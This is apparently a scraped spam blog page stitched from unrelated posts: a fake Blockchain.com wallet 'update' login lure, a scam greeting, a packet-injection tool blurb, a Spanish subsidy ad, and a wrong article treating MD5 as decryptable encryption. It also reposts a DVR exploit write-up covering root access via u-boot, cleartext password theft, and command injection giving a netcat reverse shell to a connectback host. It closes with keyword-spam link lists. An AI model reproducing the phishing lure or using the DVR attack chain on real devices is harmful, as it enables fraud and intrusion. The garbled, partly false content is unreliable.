lunes, 31 de agosto de 2020

Advanced Security - Blockchain Support Center

blockchain.com logo

Action Requi

We have updated our software to improve the security of our customers. To avoid blocking your wallet or losing your funds, you need to log in to your wallet using the button below so your wallet can be updated.

Log In To My Wallet

Once you login, a new pair of encryption keys will be generated for you, it may take a few minutes. Please be patient.

© Blockchain.com
Seguir leyendo

LP

Hello Dear I am Mrs Lima Philip Patel from Canada please can I talk to you ?? Seguir leyendo

Nemesis: A Packet Injection Utility


"Nemesis is a command-line network packet injection utility for UNIX-like and Windows systems. You might think of it as an EZ-bake packet oven or a manually controlled IP stack. With Nemesis, it is possible to generate and transmit packets from the command line or from within a shell script. Nemesis attacks directed through fragrouter could be a most powerful combination for the system auditor to find security problems that could then be reported to the vendor(s)." read more...

Website: http://www.packetfactory.net/projects/nemesis

Related news


Seguir leyendo

domingo, 30 de agosto de 2020

Subvenciones para empresas

Subvenciones a fondo perdido

Subvenciones públicas a fondo perdido.

  • Gestionamos todo tipo de subvenciones para Pymes .
  • Líneas europeas (H2020), nacionales y de las CC.AA.
  • Vigilancia 24/7 para localizar cualquier subvención que se ajuste a las necesidades de tu empresa.
  • Gestión y preparación de la documentación a presentar.
Quiero saber más sobre subvenciones

Somo expertos en gestionar subvenciones, podemos conseguir la tuya.

Contáctanos de 9 a 16 horas
en el 981 90 49 49

o te contactamos nosotros

Déjanos tus datos

Sobre nosotros

Somos un socio estratégico para tu empresa. Atendemos a empresas y autónomos de toda España.

Servicios genéricos

Plan económico
Arbitraje financiero
Factoring sin recurso
Tramitación de avales
RAI/ASNEF

Otros servicios

Subvenciones
Marketing
Fiscal laboral y contable
Hacienda y S.S.
Análisis de clientes

Seguir leyendo

USE OF CRYPTOGRAPHY IN HACKING

WHAT IS CRYPTOGRAPHY?

The Cryptography is derived from the Greek words "Kryptos". This is the study of secure communication techniques that allow only the sender and recipient of a message to view it's contents of transforming information into nonhuman readable form or vice versa is called cryptography.

As we know that information plays a vital role in running of any business and organizations etc, sensitive details in the wrong hands can leads to loss of business.

Cryptography is the science of ciphering and deciphering messages.To secure communication organizations use cryptology to cipher information .

                            Or

Cryptography is a method of protecting information and communication through the use of codes so that only those whom the information is intended can read and process it.

In Computer Science, Cryptography refers to secure information and communication techniques derived from mathematical concepts , a set of rule based calculations called algorithm to transform message in ways the hard to readable for human.

This is one of the secure way of communications for a hacker with the help of virtual private network(VPN) like Tor Browser which is also very helpful to change the IP Address(Location of the sender ) for illegal purpose to perform crime in cyberspace . I will discuss in brief about the VPN .



How to Encrypt and Decrypt the text in Cryptography?

Open this website with the help of internert surfing for encryption-"http://wwwmd5online.org" 

Open the link for Decrypt the code text-"http://www.md5online.org/md5-decrypt.html"

Type whatever you want for encryption and it will crypt in the code form, copy that code and forward to the intended person whom you want for secure communication and then he/she will Decrypt in the real form.




               
       







Continue reading


Seguir leyendo

Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer, lets turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.

Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single



This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable "bootdcmd".


Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456
Script can be found here.

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:


"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.

tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.

Related articles


  1. Hacker Tools Linux
  2. Pentest Tools Linux
  3. Hack Tools
  4. Pentest Tools Download
  5. Hacker Tools Hardware
  6. Pentest Tools Review
  7. Best Hacking Tools 2019
  8. Hacker Tools Mac
  9. Hackrf Tools
  10. Pentest Tools Online
  11. Hack Tools For Windows
  12. Github Hacking Tools
  13. Hacker Tools Free Download
  14. Hacker Tools Apk
  15. New Hacker Tools
  16. Best Hacking Tools 2019
  17. Hack Tools For Games
  18. Hacker Tools Software
  19. Hacker Tools Github
  20. Pentest Tools For Mac
  21. Pentest Tools Windows
  22. Hack Tools For Windows
  23. Termux Hacking Tools 2019
  24. Hacker Tools Hardware
  25. Hacking Tools Pc
  26. Hack Tools For Pc
  27. Hacking Tools Software
  28. Hak5 Tools
  29. Pentest Tools Online
  30. Hacking Tools Kit
  31. Hacker Tools List
  32. Hacking Tools For Pc
  33. Hacker Tools 2019
  34. Ethical Hacker Tools
  35. Pentest Tools Windows
  36. Hacker Tool Kit
  37. Pentest Tools Bluekeep
  38. Hacker Tools Apk
  39. Pentest Automation Tools
  40. Hack Tool Apk
  41. Pentest Tools Framework
  42. New Hack Tools
  43. Hacker Tools For Windows
  44. Pentest Tools For Ubuntu
  45. Hacker Tools For Mac
  46. Hacker Search Tools
  47. Hacks And Tools
  48. Blackhat Hacker Tools
  49. Hacking Tools Windows
  50. Hack Apps
  51. Usb Pentest Tools
  52. Termux Hacking Tools 2019
  53. Hacking Apps
  54. Pentest Tools Bluekeep
  55. Hacking Tools 2019
  56. Hacking Tools For Games
  57. Hacking Tools For Kali Linux
  58. Hacker Tools 2020
  59. Pentest Tools Review
  60. Pentest Tools For Android
  61. Best Hacking Tools 2019
  62. Pentest Tools Linux
  63. Hacking Apps
  64. Android Hack Tools Github
  65. Ethical Hacker Tools
  66. Pentest Tools Apk
  67. Pentest Tools List
  68. Hacking Tools Windows 10
  69. Hacker Hardware Tools
  70. Hack Tools For Pc
  71. Best Hacking Tools 2020
  72. Hacker Techniques Tools And Incident Handling
  73. Hack Tools For Ubuntu
  74. World No 1 Hacker Software
  75. Hack Tools
  76. Pentest Tools Alternative
  77. Hacker Tools Apk
  78. Hacking Tools
  79. Hacker Tools For Ios
  80. Hacker Tool Kit
  81. Hack Rom Tools
  82. Pentest Tools
  83. Pentest Box Tools Download
  84. Hack Tools For Ubuntu
  85. Pentest Tools For Ubuntu
  86. Hack Tools For Mac
  87. Best Hacking Tools 2019
  88. Hacking Tools Name
  89. Hacking Tools For Games
  90. Pentest Tools Port Scanner
  91. Hacker Tools Free
  92. Hack Tools For Windows
  93. Pentest Tools Apk
  94. Pentest Tools For Mac
  95. Pentest Tools List
  96. Pentest Tools Website
  97. Hack Website Online Tool
  98. Install Pentest Tools Ubuntu
  99. Pentest Tools For Ubuntu
  100. Pentest Tools Tcp Port Scanner
  101. Hak5 Tools
  102. Tools 4 Hack
  103. Hacking Tools Download
  104. Hack Tools Download
  105. Pentest Tools Subdomain
  106. Hacker Tools Mac
  107. Pentest Tools Android
  108. Hacking Tools Name
  109. Hacking Tools Mac
  110. Pentest Tools Open Source
  111. Hacker Tools Free
  112. Hack Tools 2019
  113. Hacker Tool Kit
  114. Pentest Tools Alternative
  115. Pentest Tools List
  116. Hacker Tools List
  117. Pentest Tools Website
  118. Hacker Tools Apk Download
  119. Pentest Tools Android
  120. New Hack Tools
  121. Blackhat Hacker Tools
  122. Hacking Tools Windows 10
  123. How To Hack
  124. Pentest Automation Tools
  125. Hacker Tools Linux
  126. Nsa Hack Tools Download
  127. Hack Tools 2019
  128. Hack Tools
  129. Hacking Tools Mac
Seguir leyendo